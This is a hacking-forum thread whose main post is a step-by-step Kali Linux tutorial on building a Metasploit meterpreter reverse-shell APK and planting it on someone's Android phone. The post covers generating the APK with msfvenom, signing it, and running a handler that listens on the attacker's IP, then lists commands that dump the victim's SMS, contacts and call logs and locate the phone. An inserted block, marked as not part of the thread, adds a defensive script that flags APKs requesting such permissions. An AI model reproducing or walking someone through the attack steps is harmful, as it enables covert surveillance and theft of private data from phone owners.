Kali Linux: How to Hack Any Android Device and Steal All Data From It.
#1

Introduction

In this tutorial, I will be showing you how to hack into any Android device and steal information from it. Some things that you can retrieve are:
  • Get Call Logs
  • Get SMS Messages
  • Get Contact List
  • Check If Android is Rooted
  • Search for Files
  • Add/Remove Files or Dictionaries
  • Edit Files
  • Take pictures with their cam.
  • Read contents on their phone
  • A ton more things you can check, remove, add, download, etc...

If you haven't read my previous thread, you will need to have Metasploit installed on your Kali Linux. If you haven't installed it, you can go HERE to know how to install it to your Linux before starting this tutorial. This is for teaching purposes only for the community of DemonForums/NGU. If you haven't seen my other tutorials for Kali Linux or Linux Mint, you can find them in the Linux Section if you wish. If you have any suggestions on some tutorials/guides I should make, please give me feedback on my work. I really would appreciate seeing what the community wants to see. Let's continue on with the tutorial, shall we?


Before We Start:

First thing you are going to need is the "SignApk" file that you will have to download. You can go HERE to find the download link for that. Now, you should have the SignApk file on your desktop. Next, we are going to create a .txt file that has this specific command you can call it for the time being. I will provide you the command right here so you can just copy and paste it to your .txt file:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /root/Desktop/Android.apk

We are going to need that file in a minute or two. Make sure to save that to your desktop, and just name it android.txt. Now, we're going to get our own Internet Protocol Address (IP Address). Open up a New Terminal and type in "ifconfig".

root@kali:~# ifconfig

Once you hit enter/continue, you should see your data come up. On the left side, locate where it says "wlan0"; on the second line, find a line that says "inet addr: 192.168.XX.XX" (or whatever your IP is). You're going to copy the IP address ONLY (192.168.XX.XX). Once that has been copied, we're going back to our desktop and going inside the android.txt file we created. You're going to paste your IP address right after the equal sign where it says "LHOST=". For a visual, this is what it should look like:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.XX.XX LPORT=4444 R > /root/Desktop/Android.apk

Once your IP Address has been pasted, we're going to copy the whole command from there. Minimize your android.txt file, and make a New Terminal Window. Follow exactly how I do it:

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.XX.XX LPORT=4444 R > /root/Desktop/Android.apk

After about 5 seconds, you should see an "Android.apk" file show up on your desktop; that means you're on the right track with me. Wait a couple more seconds, and you should see a payload size pop up under the command you pasted. Highlight on your terminal "Payload Size: XXXX bytes", then right click on the Android.apk file and go to properties. It should be the exact same size as the one on your terminal.


Signing The Apk File:

Following from where we left off, continue on with the commands I'm about to input for you. Remember to only type in order the Black Bold Words I am typing:

root@kali:~# cd Desktop/SignApk
root@kali:~/Desktop/SignApk# ls
Android.apk certificate.pem cmd.exe key.pk8 signapk.jar Signing.txt
root@kali:~/Desktop/SignApk# 

From here, we're going to drag the Android.apk file from your Desktop into the SignApk. Just drag it, and drop it in there. Make sure you click "replace" after the tab pops up. Now, click on SignApk, and open the file. You should see multiple things inside that folder, but what we are looking for is the Signing.txt. Go into the Signing.txt file, and we're about to edit some things from it. When you open it this is what it should say:

java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk

We are going to replace "your-app.apk" with Android.apk and also replace "your-app-signed.apk" with Android2.apk. As a result, it should look like this:

java -jar signapk.jar certificate.pem key.pk8 Android.apk Android2.apk

After, once you're done with the editing, you're going to copy the whole command. Go back to the original Terminal that we were using and paste the code. So this is where we left off, with the new command pasted:

root@kali:~# cd Desktop/SignApk
root@kali:~/Desktop/SignApk# ls
Android.apk certificate.pem cmd.exe key.pk8 signapk.jar Signing.txt
root@kali:~/Desktop/SignApk# java -jar signapk.jar certificate.pem key.pk8 Android.apk Android2.apk

Then, go back into the SignApk File on your desktop, and drag the folder named "Android2.apk" to the desktop. Exit out of that, and MINIMIZE YOUR TERMINAL. Please don't exit out of it. Just make sure you open a new terminal window, so you could have both up at the same time, or the older one minimized for the time being.


Metasploit Framework:

Glad you made it this far soldier, once you're in your new window of your terminal, we are going to add some more commands. 

root@kali:~# msfconsole
[It should start the process of the framework here for a few seconds...]
Now, you're going to see a lot of words pop up, don't worry. Just follow these commands in order with Black Bold Words, and you'll be done very soon.

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
(Go into the android.txt file we made earlier, and copy your IP Address from the LHOST=192.168.XX.XX and paste it onto the command that we are doing right now after set LHOST XXX.XXX.XX.XX.)
msf exploit(handler) > set LHOST 192.168.XX.XX 
PAYLOAD => XXX.XXX.XX.XX
msf exploit(handler) > set LPORT 4444
PAYLOAD => 4444
msf exploit(handler) > exploit


Installation

We're at the end guys, now, all you have to do is install the Android2.apk file on to the targeted device you are going for. Right after the APP is fully running on the device you will start to gain all the information to your terminal. From here, in your terminal once your preset command comes up that says: 

meterpreter

Type in "help" to view all the commands you can use to get the information of the android device. Right after that, the preset command "meterpreter >" should come up. For the command, type in sysinfo. You should get an unknown error command, just retype in sysinfo one more time, and you're completely in the whole device. From here, you can use all the commands to view the full android device data.


Few Commands:

Some of the main commands that are very important if you're trying to get the data are:
  • dump_calllog = Get call logs from the device.
  • dump_contacts = Check the phone's contacts.
  • dump_sms = Check the phone's messages.
  • geolocate = Get current lat-long using geolocation.
There are a lot more, but that's for you to lurk around, and try them out.


Conclusion:

That's it, you're officially done hacking the device. If you have any more suggestions on what guides/tutorials I should make, please feel free to drop a comment/PM me. Also remember to always keep in mind that it's your choice on how you use this method! If you tend to abuse them in a negative way, congrats, you're on your own, and I'm not responsible for your choices. Hope you all have a great day!

Cheers, Snow X Hydrogen
This tutorial was made by Snow/Hydrogen, and was meant for teaching purposes here on DemonForums/NGU ONLY.

© 2016 Snow/Hydrogen, DF/NGU
Reply
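A defensive check for the kind of APK the post above describes, added here as an example and not part of the original thread: it triages a sideloaded APK by looking in its manifest for the permissions behind the capabilities listed in the introduction (call logs, SMS, contacts, camera, location). The capability-to-permission mapping, the threshold of 4 and the two sample archives are assumptions constructed for illustration; a match is a reason to inspect the app, not proof of anything.

```python
import io
import zipfile

# Assumption: capabilities named in the post, mapped to the Android
# permissions an app must declare to use them.
CAPABILITY_PERMS = {
    "call logs": "android.permission.READ_CALL_LOG",
    "sms": "android.permission.READ_SMS",
    "contacts": "android.permission.READ_CONTACTS",
    "camera": "android.permission.CAMERA",
    "location": "android.permission.ACCESS_FINE_LOCATION",
}

def manifest_capabilities(apk_bytes):
    """List the capabilities whose permission name occurs in the manifest."""
    try:
        with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
            manifest = apk.read("AndroidManifest.xml")
    except (zipfile.BadZipFile, KeyError) as exc:
        raise ValueError("not an APK with a manifest") from exc
    found = []
    for capability, perm in CAPABILITY_PERMS.items():
        # Compiled manifests keep strings in a pool encoded as UTF-16LE
        # or UTF-8, so a byte search in both encodings is enough for triage.
        if perm.encode("utf-16-le") in manifest or perm.encode() in manifest:
            found.append(capability)
    return found

def triage(apk_bytes, threshold=4):
    """Flag an APK that asks for at least `threshold` of the capabilities."""
    caps = manifest_capabilities(apk_bytes)
    return {"capabilities": caps, "flag": len(caps) >= threshold}

def constructed_apk(perms, encoding="utf-16-le"):
    """Build a constructed test archive: a zip with a stand-in manifest."""
    blob = b"\x00\x00".join(p.encode(encoding) for p in perms)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", blob)
    return buf.getvalue()

if __name__ == "__main__":
    spy_like = constructed_apk(CAPABILITY_PERMS.values())
    camera_app = constructed_apk(["android.permission.CAMERA"], "utf-8")
    print(triage(spy_like))    # all five capabilities, flag True
    print(triage(camera_app))  # camera only, flag False
```

On a managed fleet the same check can run over APKs pulled from devices or from a download proxy, alongside a policy that blocks installs from unknown sources.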
#2
This is another great tutorial man, I appreciate this. I'll have to try it out sometime.
Reply